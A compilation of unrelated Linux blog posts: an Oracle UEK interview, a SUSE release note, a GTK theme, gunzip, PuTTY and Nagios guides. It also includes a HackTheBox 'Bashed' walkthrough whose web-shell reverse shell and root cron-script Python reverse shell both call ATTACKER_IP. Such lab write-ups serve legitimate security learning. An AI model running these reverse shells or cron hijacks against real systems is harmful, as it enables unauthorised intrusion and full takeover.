Oracle Q&A. A Refresher on Unbreakable Enterprise Kernel

UEK

UEK is a Linux kernel that Oracle created to address the needs of customers running demanding software such as Oracle Database on large scale systems.

Oracle caused quite a stir in 2010 when it announced its Unbreakable Enterprise Kernel for Oracle Linux. We’ve checked in with Sergio Leunissen, Vice President, Linux and VM Development at Oracle, for an update on the ABCs of this important introduction as well as the company’s latest take on Linux.

Linux Foundation: First, please remind us what exactly is the Unbreakable Enterprise Kernel (UEK)?

Leunissen: UEK is a Linux kernel Oracle created to address the needs of customers running demanding software such as Oracle Database on large scale systems. Its focus is performance, stability, and minimal backports by tracking the upstream kernel code as closely as is practical. UEK is well-tested and used to run Oracle Engineered Systems, Oracle Cloud Infrastructure, and large enterprise deployments for Oracle customers. The source for UEK is published on GitHub: https://github.com/oracle/linux-uek

LF: Who is seeing the biggest benefit from the UEK?

Leunissen: First, it goes without saying that customers running Oracle software benefit from our development and testing of Oracle Database and middleware on tens of thousands of systems running Linux with UEK on a daily basis. Add to that the demands of running the infrastructure for Oracle Cloud, which hosts SaaS applications, databases, containers, Kubernetes clusters, and more. Our customers can take comfort in knowing that the kernel they run is the same one we run.

But, by no means do only Oracle customers benefit. Our kernel team adds features to, and fixes bugs in, subsystems that span the Linux kernel, including networking, block storage, filesystems, etc. This development benefits any workload relying on the kernel’s overall ability to handle lots of memory, network, and I/O.

Finally, because UEK tracks upstream kernels so closely, the bugs we find and fix are relevant to the mainline Linux kernel.

LF: The Unbreakable Enterprise Kernel is touted as fast, modern and reliable. Can you elaborate on these benefits?

  • Fast – Optimized to run well on large systems with lots of memory and large storage systems. Works well with modern solid state storage.
  • Modern – tracking mainline Linux closely to incorporate the latest innovations
  • Reliable – Extensively tested by Oracle with real world workloads

Most customers we work with must stick to specific releases of core userspace components but do want to exploit innovations from upstream development efforts. With UEK, we are able to balance an enterprise support model with a Linux kernel that syncs up with mainline more frequently.

LF: How much emphasis do you put on security in your kernel development work?

Leunissen: Oracle is a cloud provider that contributes to Linux. Oracle Linux is the host OS for most of the Oracle application and infrastructure offerings. As such, we work closely with our cloud development team to build a scalable Linux platform with virtualization and container services without compromising on security. UEK is a key part of this.

LF: The Linux kernel developers at Oracle work both on mainline directly and UEK, can you explain how this works?

Leunissen: As mentioned above, we publish the source for UEK on GitHub. Keeping our changes open source enables us to integrate with upstream Linux kernels quickly, which also means we have state-of-the-art drivers and filesystems, hardware support, and security fixes from the community. And, again, because UEK tracks upstream kernels so closely, we don’t spend a lot of time addressing bugs that are unique to the kernel as it relates to Oracle’s efforts. Rather, our fixes are relevant to upstream kernels as well.

LF: Are there particular development projects you are working on that you’d like to highlight?

Leunissen: As a cloud provider, containers and virtualization are important to Oracle. We do a lot of work on KVM and QEMU. For example, we are doing work to make sure Xen VM guests can run as is on a KVM host. Recently we’ve been working on Kata containers (previously Clear Containers), which is a deployment model for applications that combines the isolation of VMs with the speed, footprint, and interaction model of containers. Also, with UEK powering tens of thousands of systems in our cloud, we are doing work to improve the startup time performance for Linux systems by parallelizing kernel boot-time tasks, shaving precious seconds off the startup time for bare metal and virtualized workloads. Finally, it would be remiss not to point out that we are actively working on Linux for ARM with the focus to provide a high-quality Linux OS for 64-bit ARM (aarch64)-based servers.

Source

SUSE Cloud Application Platform v1.3 released


SUSE Cloud Application Platform Stratos UI

SUSE Cloud Application Platform showing Kubernetes node metrics

SUSE Cloud Application Platform v1.3 is now available! If you’re in Seattle for Kubecon this week, be sure to stop by our booth for a new pair of socks, a demo, or to learn more. The new version focuses on our continuing effort to provide a cloud native developer experience to Kubernetes users, an improved UI, additional services brokers, and more.

You can now graphically track metrics and see into the underlying Kubernetes infrastructure with an updated version of Stratos UI. Stratos is a web console that manages Cloud Foundry clusters and the workloads running on them, and it is adding more Kubernetes integration with each release. In this newest version, application and Kubernetes pod attributes such as CPU and memory usage are tracked in a graph over time, and the status of the underlying Kubernetes cluster is now available.

Easily connect to a broad range of services with open source service brokers for services hosted on Azure and Amazon, including MariaDB, MySQL, Oracle, PostgreSQL, SQL Server, and more. For development and testing purposes, the Helm Minibroker provisions services in containers on your Kubernetes cluster. It currently supports MySQL, PostgreSQL, MariaDB, and MongoDB.

New support for CredHub allows you to centrally secure and manage credential generation, storage, lifecycle management, and access. CredHub manages credentials like passwords, certificates, certificate authorities, ssh keys, rsa keys and arbitrary values (strings and JSON blobs). It provides a CLI and API to get, set, generate and securely store credentials.
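
For illustration, here is a minimal sketch of how the CredHub CLI is typically used once it is connected to a CredHub server; the credential names and values are hypothetical examples rather than anything shipped with SUSE Cloud Application Platform:

credhub generate -n /my-app/db-password -t password -l 32

credhub get -n /my-app/db-password

credhub set -n /my-app/api-token -t value -v "example-token"

The first command asks CredHub to generate and store a 32-character password, the second retrieves it, and the third stores a caller-supplied value.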

SUSE Cloud Application Platform supports Amazon EKS, Azure AKS, and SUSE CaaS Platform. Support for additional public cloud Kubernetes services will follow.

Don’t forget that additional Kubernetes integration is coming soon with support for the Cloud Foundry Foundation’s Project Eirini along with Istio!

 


Source

Amber Is A Cool Ambiance-Inspired Gtk / Gnome Shell Theme

Amber Gtk theme

Amber is a Gtk+ 3, Gtk+ 2 and Gnome Shell theme inspired by Ubuntu’s Ambiance theme.

Amber uses slightly different colors than Ambiance and no gradients for application toolbars, while still being reminiscent of the former default Ubuntu theme (Ambiance was the default until Ubuntu 18.10, when the default theme was changed to Yaru).

The theme only supports Gnome (Shell) right now, with Gtk 3.22 or newer being required (Ubuntu 18.04 and newer / Fedora 28 or newer). Update: the theme now also supports Xfce (Xfwm4):

Amber theme Xfce

Designed by Mattias (lassekongo83), known for his work on the beautiful Zuki themes, Amber "is almost finished", with some polishing being on the todo list, or so it says on its repository page. The theme looks great on my Ubuntu 18.10 desktop (with Gtk 3.24 and Gnome Shell 3.30), and I’ve been using it for about a week with no issues.

Amber Gtk theme

Amber Gnome Shell theme

You’ll notice that the theme comes with its own Dash to Dock (and Dash to Panel) running indicator style – the line to the left of the running applications. Ubuntu uses a fork of Dash to Dock that doesn’t allow disabling the default running indicator, so you’ll get both the Amber theme running indicator, as well as the one used by the Ubuntu Dock extension.

One way around this is to install the original Dash to Dock and disable it, then change its settings using Dconf Editor (/org/gnome/shell/extensions/dash-to-dock/running-indicator-style) – changing its settings should affect not only the original Dash to Dock, but also Ubuntu Dock. Another way is to remove or disable the Ubuntu Dock and use the original Dash to Dock or Dash to Panel, which are much more customizable. This is only a minor inconvenience though.
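
If you prefer the command line over Dconf Editor, the same key can usually be read and changed with gsettings. The schema and value names below assume a recent Dash to Dock release, so double-check them against your installed version:

gsettings get org.gnome.shell.extensions.dash-to-dock running-indicator-style

gsettings set org.gnome.shell.extensions.dash-to-dock running-indicator-style 'DOTS'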


Install Amber Gtk / Gnome Shell theme

To install Amber, visit its GitHub repository, click the green Clone or download button, then click on Download ZIP. Extract the theme and copy the theme folder into ~/.themes. Create this folder if it doesn’t already exist (.themes is a hidden folder – press Ctrl + H to show/hide hidden files and folders).

Those who prefer to do this from the command line can run the commands below to create the ~/.themes folder, download and extract the theme, and remove the downloaded master.zip file:

mkdir -p ~/.themes && cd ~/.themes

wget https://github.com/lassekongo83/amber-theme/archive/master.zip

unzip master.zip

rm master.zip
If you’re familiar with Git, get the theme using Git so you can easily update it later.
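
As a sketch, assuming you just want a local clone you can pull from later (the theme folder name inside the repository may differ, so check the repository layout first):

git clone https://github.com/lassekongo83/amber-theme.git ~/amber-theme

cp -r ~/amber-theme/THEME_FOLDER ~/.themes/

cd ~/amber-theme && git pull

Running git pull later fetches theme updates; just copy the theme folder into ~/.themes again afterwards.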

The theme requires installing the Murrine and Pixbuf engines for Gtk+ 2. While there are very few applications that use Gtk+ 2 nowadays, it’s a good idea to install these anyway.

On Ubuntu or Debian you can install the Murrine and Pixbuf Gtk+ 2 engines using:

sudo apt install gtk2-engines-murrine gtk2-engines-pixbuf
On Fedora, use:

sudo dnf install gtk2-engines gtk-murrine-engine
On other Linux distributions, search for Murrine and Pixbuf using your package manager.

And finally, use the Gnome Tweaks application to change the applications and/or the shell theme. If you’re not familiar with this, see: How To Change The Gtk, Icon Or Gnome Shell Theme

Source

Tis the Season for My Top 10 Predictions for 2019


Tis the season for spending time with loved ones, reminiscing about the past year and, of course, technology forecasts and predictions. Whether we like it or not, nothing ever stays the same, in life or in business. My kids get older, their personalities mature and, as a parent, I have to evolve the way I interact with them. It is the same for business: customer expectations continue to evolve, new technologies are developed to push the envelope, and all of that leads to continuous transformation of our business, our people, our processes and, of course, the technology and infrastructure.

As I started thinking about expectations for the coming year, I was struck with a strange feeling of déjà vu. Much of what’s on my list for 2019 is remarkably similar to last year. But there is a difference. Much of what might have been considered emerging technology 12 months ago is now maturing nicely and ready for more mainstream adoption. And for many of the items on my list, that has happened remarkably quickly.

Here are my predictions for 2019:

1. More major cybersecurity breaches

No real surprise here. Serious data hacks seem to be coming thick and fast. Marriott is the latest to hit the news with the second biggest hack of all time. Here’s a serious reality check: If you haven’t got a strong security plan and measures in place already, it may already be too late.

2. Major business failures will again hit the headlines

Household names and brands disappearing is nothing new. Toys R Us filed for bankruptcy in 2018 and while there are efforts to save it, it is a good example of how a company must evolve to stay relevant. Expect more of them to fall, if they miss the opportunity to adapt and transform. Make sure you’re not one of them.

3. Accelerated Artificial Intelligence (AI) and Machine Learning (ML) application development and adoption

Organizations of all types and sizes have now bought into the productivity, efficiency and customer experience improvements to be gained from AI and ML. Leveraging high-performance computing, AI and ML underpin many of the tech trends I highlighted in 2018 including AR/VR, autonomous vehicles/drones, big data/analytics and robotics. Greater investment and focus in both these areas will surely follow.

4. The Internet of Things (IoT) is set to take off

But don’t expect IoT growth to be consumer-led – at least not yet. With IoT security improving and related technologies maturing, business IoT is my bet for a major expansion in 2019, with manufacturing, healthcare, retail and utilities at the forefront.

5. Expect to see more autonomous vehicles

They’re on our roads already in pilot programs. Over the next year, watch out for more real-world testing of cars, trucks and public transport, as well as industrial and farming vehicles.

6. Containers will make implementing hybrid/multi-cloud easier

Containerized applications and workloads are increasingly at the heart of development projects. Kubernetes and DevOps are now mainstream. Monolithic applications have had their day. Containers make it easier to implement a hybrid and multi-cloud strategy by deploying, moving or expanding cloud-native applications to your cloud platform of choice, even straddling cloud boundaries as needed.

7. Anticipate a new raft of technology-related acquisitions

More traditional, legacy businesses will be looking to buy innovation, new technologies and expertise in order to keep up with shifting market dynamics and in a move to avoid becoming irrelevant to their customer base.

8. Mobile devices will become even more indispensable to our lifestyle

Let’s be honest, most of us would be lost without our mobile phone, smartwatch or fitness tracker already. They’re how we now expect to interact with the world around us and how we want new real-time services delivered. Unfortunately, there is a downside. We are going to be even more glued to our devices.

9. Blockchain is finally going to deliver some business value.

While blockchain is often maligned, there are new and valid use cases on the horizon that will help change perceptions. I expect interest to grow from government agencies, the finance sector, manufacturing, retail and the IoT world.

10. Open source software will continue to thrive and play a pivotal role in all of these predictions

Why? Because open source communities have become the vanguard of innovation. Open source software plays a pivotal role in all the dominant technology trends and is increasingly relied on by enterprise businesses around the globe.

Let me leave you with one more prediction.

At this time of year, it seems like everyone starts forecasting what the next year might bring. I predict that very few of them will get checked later to see if they were on the money or whether they missed the mark.

I’ll be checking mine from time to time throughout the year. I invite you to do the same.

Please feel free to send me your comments, observations or even your own predictions.

 


Source

Guide to Learn Linux gunzip Command with Examples

gunzip command

Have you come across files bearing a .gz extension? These are files that have been compressed using the gzip command. gunzip is a Linux command used to decompress files bearing the .gz extension, and in this tutorial we will look at different usages of the gunzip command.

But first, let’s compress a file using the gzip command. The syntax will be as follows

# gzip file_name

When you verify with the ls command, you will notice that the original file has been replaced by a compressed file with the same name plus a .gz extension.

Output

# file_name.gz

Let’s now see how we can decompress files.

1) Decompress files using the Gzip Command

In addition to compressing files, the gzip command can also be used to decompress files. The syntax for decompressing a file is

# gzip -d file_name.gz

Output

# file_name

To decompress files recursively in a folder add the -r flag as shown

# gzip -dr folder_name

2) Decompress files using the Gunzip Command

While the gzip command comes in handy for both compressing and decompressing files, the gunzip command decompresses files with a simpler syntax that’s easy to remember. The syntax is

# gunzip file_name.gz

Output

# file_name

Once gunzip decompresses a file, the .gz extension is removed. The file file_name.gz changes back to file_name and is restored to its original, uncompressed size.

3) Display verbose output of decompression

To display verbose output, append the -v flag as shown

# gunzip -v file_name.gz

Output

test_file.gz: 52.1% -- replaced with test_file

4) Keep both the compressed file and the decompressed one

To keep both copies of the compressed and decompressed file run

# gunzip -k file_name.gz

You will now have two files, file_name and file_name.gz

Output

file_name.gz file_name

5) Display the contents of a compressed file without decompressing it

To write the decompressed contents of the file to standard output, leaving the compressed file in place, run

# gunzip -c file_name.gz

6) To display more information about a compressed file

To get more information about the compressed file run

# gunzip -l file_name.gz

The output of the above command will give the following values

  • Compressed size
  • Uncompressed size
  • Ratio of compression
  • Uncompressed name

Gunzip Command

This information comes in handy when dealing with large file sizes, especially when you are running low on disk space. You wouldn’t want to carelessly uncompress large files lest they eat up your remaining disk space.
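
For example, before extracting into the current directory you could compare the uncompressed size reported by gunzip -l against the free space shown by the standard df tool (the file name here is just a placeholder):

# gunzip -l file_name.gz

# df -h .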

7) To decompress lots of files recursively

To achieve this, run

# gunzip -r folder_name

Let’s assume you have a folder structure like the one below, where office_files is the main folder containing the zipped files sales.gz and marketing.gz plus another folder, 2018 Report, with more zipped files.

office_files
  sales.gz
  marketing.gz
  2018 Report
    first_quarter_report.gz
    second_quarter_report.gz
    third_quarter_report.gz
    last_quarter_report.gz

8) To decompress all the files within a directory

Run the command below to decompress all of the files in the directory, including those in its subfolders.

# gunzip -r office_files

9) Test whether a compressed file is a valid file compressed using gzip

To do this, run

# gunzip -t file_name.gz

If the file is invalid, you’ll get a warning but if it’s valid, nothing will be printed on the screen and you’ll be taken back to the shell.
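
Because gunzip -t reports the result through its exit status, you can also use it in a quick shell check, for example:

# gunzip -t file_name.gz && echo "valid gzip file" || echo "corrupt or not a gzip file"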


Source

How to Install Putty on Ubuntu and Other Linux Distributions


Last updated December 11, 2018

If I am not wrong, Putty is perhaps the most popular SSH client for Windows.

In IT companies, the development environment is usually on a remote Linux system while the developers use Windows as their local system. Putty is used for connecting to the remote Linux system from the Windows machine.

Putty is not limited to Windows only. You can also use this open source software on Linux and macOS.

But wait! Why would you use a separate SSH client on Linux when you already have the ‘real’ Linux terminal with you? There are several reasons why you would want to use Putty on Linux.

  • You have used Putty for so long on Windows that you are more comfortable with it.
  • You find it difficult to manually edit the SSH config file to save various SSH sessions. You prefer Putty’s graphical way of storing SSH connections.
  • You want to debug by connecting to raw sockets and serial ports.

Whatever may be the reason, if you want to use Putty on Ubuntu or any other Linux, you can certainly do so. Let me show you how to do that.

Installing Putty on Ubuntu Linux

Installing Putty on Linux

The good news for the Ubuntu users is that Putty is available in the universe repository of Ubuntu.

To install Putty on Ubuntu, you should first make sure that the universe repository is enabled.

sudo add-apt-repository universe

Once you have the universe repository enabled, you should update Ubuntu with this command:

sudo apt update

After this, you can install Putty with this command:

sudo apt install putty

Once installed, you can start Putty by finding it in the menu.

As you can see in the screenshot below, the Linux version of Putty looks the same as the Windows version. That’s a relief because you won’t have to fiddle around trying to find your way through new and unfamiliar settings.

Putty in Linux

When you enter the remote system’s hostname or IP address and connect to it, Putty will utilize the already saved SSH keys in your home directory.

Using Putty in Ubuntu Linux
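
Putty can also be launched straight from the terminal with the connection details given as command line options; the host and session names below are placeholders:

putty -ssh -P 22 user@remote-host

putty -load "my-saved-session"

The first command opens an SSH connection directly, while the second loads a session you previously saved in the Putty GUI.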

Installing Putty on other Linux distributions

Putty is available for Debian so you just need to use apt-get or aptitude for installing it.

sudo apt-get install putty

Putty is also available for Fedora/Red Hat and can be installed using the default package manager.

sudo dnf install putty

You can also easily install Putty in Arch Linux based distributions.

sudo pacman -S putty

Remember that Putty is an open source software. You can also install it via source code if you really want to. You can get the source code of Putty from the link below.

I would always prefer the native Linux terminal over an SSH client like Putty. I feel more at home with the GNOME terminal or Terminator. However, it’s up to the individual to choose between the default terminal and Putty on Linux.

What do you use for managing multiple SSH connections on Linux?

Source

How To Install and Configure Nagios on CentOS 7

Nagios is one of the most popular open source monitoring systems. Nagios keeps an inventory of your entire IT infrastructure and ensures your networks, servers, applications, services, and processes are up and running. In case of failure or suboptimal performance Nagios will send notification alerts via various methods.

This tutorial describes how to install and configure Nagios Core on a CentOS 7 server.

Prerequisites

Before continuing with this tutorial, make sure you are logged in as a user with sudo privileges.

Disable SELinux or set it to permissive mode as instructed here.
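
As a rough sketch, SELinux can be switched to permissive mode for the current boot and made persistent across reboots like this (assuming /etc/selinux/config currently contains SELINUX=enforcing):

sudo setenforce 0
sudo sed -i 's/^SELINUX=enforcing$/SELINUX=permissive/' /etc/selinux/config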

Update your CentOS system and install Apache, PHP and all the packages necessary to download and compile the Nagios main application and Nagios plugins:

sudo yum update
sudo yum install httpd php php-cli gcc glibc glibc-common gd gd-devel net-snmp openssl-devel wget
sudo yum install make gettext autoconf net-snmp-utils epel-release perl-Net-SNMP postfix unzip automake

Installing Nagios on CentOS

Perform the following steps to install the latest version of Nagios Core from source.

1. Downloading Nagios

We’ll download Nagios source in the /usr/src directory which is the common location to place source files.

Navigate to the directory with:

cd /usr/src

Download the latest version of Nagios from the project Github repository using the following wget command:

sudo wget https://github.com/NagiosEnterprises/nagioscore/archive/nagios-4.4.2.tar.gz

Once the download is complete extract the tar file with:

sudo tar zxf nagios-*.tar.gz

Before continuing with the next steps, make sure you change to the Nagios source directory by typing:

cd nagioscore-nagios-4.4.2/

2. Compiling Nagios

To start the build process, run the configure script, which will perform a number of checks to make sure all of the dependencies on your system are present:

sudo ./configure

Upon successful completion, the following message will be printed on your screen:

*** Configuration summary for nagios 4.4.2 2018-08-16 ***:

General Options:
-------------------------
Nagios executable: nagios
Nagios user/group: nagios,nagios
Command user/group: nagios,nagios
Event Broker: yes
Install ${prefix}: /usr/local/nagios
Install ${includedir}: /usr/local/nagios/include/nagios
Lock file: /run/nagios.lock
Check result directory: /usr/local/nagios/var/spool/checkresults
Init directory: /lib/systemd/system
Apache conf.d directory: /etc/httpd/conf.d
Mail program: /sbin/sendmail
Host OS: linux-gnu
IOBroker Method: epoll

Web Interface Options:
------------------------
HTML URL: http://localhost/nagios/
CGI URL: http://localhost/nagios/cgi-bin/
Traceroute (used by WAP): /bin/traceroute

Review the options above for accuracy. If they look okay,
type ‘make all’ to compile the main program and CGIs.

Start the compilation process using the make command:

sudo make all

The compilation may take some time, depending on your system. Once the build process is completed, the following message will be printed on your screen:

….
*** Compile finished ***

For more information on obtaining support for Nagios, visit:

Nagios Support Home

*************************************************************

Enjoy.

3. Creating Nagios User And Group

Create a new system nagios user and group by issuing:

sudo make install-groups-users

The output will look something like below:

groupadd -r nagios
useradd -g nagios nagios

Add the Apache user, apache, to the nagios group:

sudo usermod -a -G nagios apache

4. Installing Nagios Binaries

Run the following command to install Nagios binary files, CGIs, and HTML files:

sudo make install

You should see the following output:


*** Main program, CGIs and HTML files installed ***

5. Creating External Command Directory

Nagios can process commands from external applications. Create the external command directory and set the proper permissions by typing:

sudo make install-commandmode

*** External command directory configured ***

6. Install Nagios Configuration Files

Install the sample Nagios configuration files with:

sudo make install-config


*** Config files installed ***

Remember, these are *SAMPLE* config files. You’ll need to read
the documentation for more information on how to actually define
services, hosts, etc. to fit your particular needs.

7. Install Apache Configuration Files

Run the command below to install the Apache web server configuration files:

sudo make install-webconf

...
*** Nagios/Apache conf file installed ***

8. Creating Systemd Unit File

The following command installs a systemd unit file and also configures the nagios service to start on boot.

sudo make install-daemoninit

...
*** Init script installed ***

9. Creating User Account

To be able to access the Nagios web interface, we’ll create an admin user called nagiosadmin.

Run the following htpasswd command to create the nagiosadmin user:

sudo htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin

You will be prompted to enter and confirm the user’s password.

New password:
Re-type new password:
Adding password for user nagiosadmin
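
If you later want to add more web users, run htpasswd against the same file without the -c flag, which would otherwise recreate the file; the user name below is only an example, and extra users may also need permissions granted in cgi.cfg to see all hosts and services:

sudo htpasswd /usr/local/nagios/etc/htpasswd.users another_user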

Restart the Apache service for changes to take effect:

sudo systemctl restart httpd

Configure the Apache service to start on boot.

sudo systemctl enable httpd

10. Configuring Firewall

The firewall will secure your server against unwanted traffic.

If you don’t have a firewall configured on your server, you can check our guide about how to set up a firewall with firewalld on CentOS.

Open the Apache ports by running the following commands:

sudo firewall-cmd --permanent --zone=public --add-service=http
sudo firewall-cmd --permanent --zone=public --add-service=https
sudo firewall-cmd --reload

Installing Nagios Plugins

Switch back to the /usr/src directory:

cd /usr/src

Download the latest version of the Nagios Plugins from the project Github repository:

sudo wget -O nagios-plugins.tar.gz https://github.com/nagios-plugins/nagios-plugins/archive/release-2.2.1.tar.gz

When the download is complete extract the tar file:

sudo tar zxf nagios-plugins.tar.gz

Change to the plugins source directory:

cd nagios-plugins-release-2.2.1

Run the following commands one by one to compile and install the Nagios plugins:

sudo ./tools/setup
sudo ./configure
sudo make
sudo make install

Starting Nagios

Now that both Nagios and its plugins are installed, start the Nagios service with:

sudo systemctl start nagios

To verify that Nagios is running, check the service status with the following command:

sudo systemctl status nagios

The output should look something like below, indicating that the Nagios service is active and running.

nagios.service - Nagios Core 4.4.2
Loaded: loaded (/usr/lib/systemd/system/nagios.service; enabled; vendor preset: disabled)
Active: active (running) since Sat 2018-12-08 14:33:35 UTC; 3s ago
Docs: https://www.nagios.org/documentation
Process: 22217 ExecStart=/usr/local/nagios/bin/nagios -d /usr/local/nagios/etc/nagios.cfg (code=exited, status=0/SUCCESS)
Process: 22216 ExecStartPre=/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg (code=exited, status=0/SUCCESS)
Main PID: 22219 (nagios)
CGroup: /system.slice/nagios.service
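
If the service fails to start, you can run the same configuration check that the unit file performs before startup (see the ExecStartPre line above) to find out what is wrong:

sudo /usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg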

Accessing the Nagios Web Interface

To access the Nagios web interface open your favorite browser and type your server’s domain name or public IP address followed by /nagios:

http(s)://your_domain_or_ip_address/nagios

Enter the nagiosadmin user login credentials and you will be redirected to the default Nagios home page as shown on the image below:
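
If you prefer to verify from the command line first, a quick curl request such as the one below should prompt for the nagiosadmin password and return an HTTP success response when authentication is working:

curl -u nagiosadmin -I http://your_domain_or_ip_address/nagios/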

Conclusion

You have successfully installed the latest Nagios version from source on your CentOS system.

You should now check the Nagios Documentation and learn more about how to configure and use Nagios.

If you hit a problem or have feedback, leave a comment below.

Source

Pop the Box – ls /blog

Let’s talk a little about this box. On this HTB machine we will see that only one port is open, the HTTP one. We will fire up DirBuster to find the different files and directories on the website, and that is how we come to know about the phpbash file, from which we get code execution. After getting the reverse shell we will enumerate further and find a way to escalate privileges and become root. This time I have made two videos: the first is on getting our first reverse shell on the box, and the second is on how to escalate the privileges. Hope you guys enjoy it. Last but not least, I have uploaded some files from which you will be able to learn about bash scripting, Python, and how cron jobs work.

BASHED BOX WALKTHROUGH

About this machine

  1. Machine Name: Bashed
  2. Machine Architecture : Linux
  3. Machine creator: Arrexel
  4. IP address: 10.10.10.68
  5. User owned: 6334
  6. User rooted: 4218
  7. Points: 20

Prerequisites

  1. As always, you must have the hacker’s mindset to approach different vulnerabilities.
  2. This time you need a little bit of knowledge about bash and Python.
  3. You must know how to use DirBuster or any other tool for finding different folders and files.
  4. You must know how to use nmap for scanning ports.
  5. If you know bash, that will be a plus point.
  6. Different approaches
  7. A “try harder” mindset

[Disclaimer: That’s all you need. Now let’s try to pentest this machine.]

Enumeration Part

-Nmap Scan

So, first we need to scan for the open ports. Let’s do it.

We will use four nmap options: -sS, -sV, -sC and -Pn. You might be wondering what these are; they are just scanning options. I really want you all to read the man page of nmap, where you can understand what these options are used for. Let me just point them out simply (a combined scan command is shown after this list).

  1. -sS: Performs a TCP SYN scan. You also need root privileges to use this option, I believe.
  2. -sV: Probes open ports to determine their service and version information.
  3. -sC: Runs the default nmap NSE scripts. To learn what NSE scripts are, read this article. [Chapter 9. Nmap Scripting Engine] Just read about it and you will understand.
  4. -Pn: Treats all hosts as online, no matter what. It is good practice to use it to bypass host-discovery filtering.
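
Putting those options together, the scan for this box looks something like the command below; the output file name is just my choice:

sudo nmap -sS -sV -sC -Pn -oN bashed_nmap.txt 10.10.10.68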


The scan has completed, as you can see in the screenshot above. Only port 80 is open.

-Understanding Nmap output

So we have one open port; now let’s try to understand the output.

#1

Port: 80

State: Open

Service: http

Version: Apache httpd 2.4.18

Let’s check what it really looks like.

It seems like it’s working perfectly. Anyway, let’s start enumerating the box.


Low Level Exploitation

The very first thing that I always do is check the page source and the robots.txt file.

So here it is ,

I don’t know if you are able to see it or not but there is nothing interesting here.

So, let’s start our favorite DirBuster to find directories. If you don’t know what it is, let me tell you.

DirBuster: a Java tool designed to brute force directories and page names on websites. It is an OWASP project; you can read more about it “Here”. Let’s start it:

In the Target URL option you need to enter the address of the website, which in our case is 10.10.10.68. Under Number of Threads I increased the value to 54 to speed up the process, and under the wordlist option you need to specify the directory list; I used the medium list that DirBuster comes with. Give the file extension according to your need; php is just fine for me here. Let’s start our DirBuster.

As you can see, we got quite a few folders and some php files, so I have exported the result to a text file. Here it is:

DirBuster 1.0-RC1 - Report

http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Apr 30 02:48:56 EDT 2018

--------------------------------

http://10.10.10.68:80
--------------------------------

Directories found during testing:
Dirs found with a 200 response:

/images/
/uploads/
/js/
/php/
/demo-images/
/css/
/dev/
Dirs found with a 403 response:
/icons/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/index.html
/single.html
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/custom_google_map_style.js
/js/html5.js
/php/sendMail.php
/js/jquery.mousewheel.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.easing.1.3.js
/js/jquery.touchSwipe.min.js
/js/main.js
/css/carouFredSel.css
/css/clear.css
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/dev/phpbash.min.php
/dev/phpbash.php
--------------------------------


Let’s check that php directory.

There is one php file, “sendMail.php”. Let’s check the /dev directory now.

Okay, there are some files here too. Let’s try to open phpbash.php.

Okay, it looks like a bash terminal running in the browser, so now we can execute commands.

Amazing. Let’s try to get a reverse shell on this box.
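
One common way to do this from phpbash is to start a listener on your own machine and then fire a bash reverse-shell one-liner from the web shell; ATTACKER_IP and the port 4444 are placeholders for your own values:

# on your attacking machine
nc -lvnp 4444

# in phpbash on the target
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'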

Now we finally have our first low-hanging-fruit reverse shell on this machine, running as the www-data user.


Privilege Escalation

So now we need to escalate our privileges to become “root”. For this box I am going to show you three different methods of privilege escalation.

First let’s start our enumeration manually; later we will upload some scripts to check other things. Let’s begin by checking the distribution type with the command “cat /etc/issue”.

www-data@bashed:/home/arrexel$ cat /etc/issue
Ubuntu 16.04.2 LTS \n \l

Okay, so this is an Ubuntu box running version 16.04.2. Great. Now let’s check which directories are world-writable and which binaries have the setuid bit set, using the following commands.

www-data@bashed:/home/arrexel$ find / -perm -222 -type d 2>/dev/null
/var/www/html/uploads
/var/tmp
/var/lib/php/sessions
/run/lock
/tmp
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.XIM-unix
/tmp/VMwareDnD
/tmp/.ICE-unix
/tmp/.X11-unix
/dev/mqueue
/dev/shm
www-data@bashed:/home/arrexel$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/fusermount
/bin/su
/bin/umount
/bin/ping6
/bin/ntfs-3g
/bin/ping
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

Nothing seems interesting here. So now let’s try “sudo -l” to list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host. A longer list format is used if this option is specified multiple times and the security policy supports a verbose output format.

So, we can sudo to the scriptmanager user without any password. Let’s do it.
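
A minimal way to do that is to ask sudo for a shell as scriptmanager and then confirm the switch, for example:

sudo -u scriptmanager bash -i
id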

Amazing, now we are no longer www-data. Let’s start our enumeration from the root directory, “/”.

If you use Linux as your primary operating system, you will notice that the “/scripts” directory is suspicious; it does not come with Linux by default. So, let’s check which files and directories are inside that folder.

There are two files: test.py and test.txt. Let’s check what is written in test.py.

Okay, so it is a simple Python script which opens the file test.txt in write mode, writes “testing 123!” into it and then closes the file. If you look at the screenshot above again, you will see that test.txt was modified less than a minute ago, which suggests a cron job is running every minute.

Here is the proof that it is running every minute. Now we know that whatever is inside test.py will be executed as root, so we can rewrite test.py to contain our Python reverse shell, as sketched below.
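
As a sketch, from the scriptmanager shell you can overwrite test.py with a standard Python reverse shell and let the cron job do the rest; ATTACKER_IP and port 5555 are placeholders, and the listener runs on your own machine:

# on your attacking machine
nc -lvnp 5555

# on the target, as scriptmanager
cd /scripts
cat << 'EOF' > test.py
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("ATTACKER_IP", 5555))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
EOF

Within a minute the cron job runs test.py as root and the listener receives a root shell.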

Amazing, we have finally escalated our privileges to root.

Source

How to Update Ubuntu [Terminal & GUI Methods]

This tutorial shows you how to update Ubuntu for both server and desktop versions. It also explains the difference between update and upgrade along with a few other things you should know about updates in Ubuntu Linux.

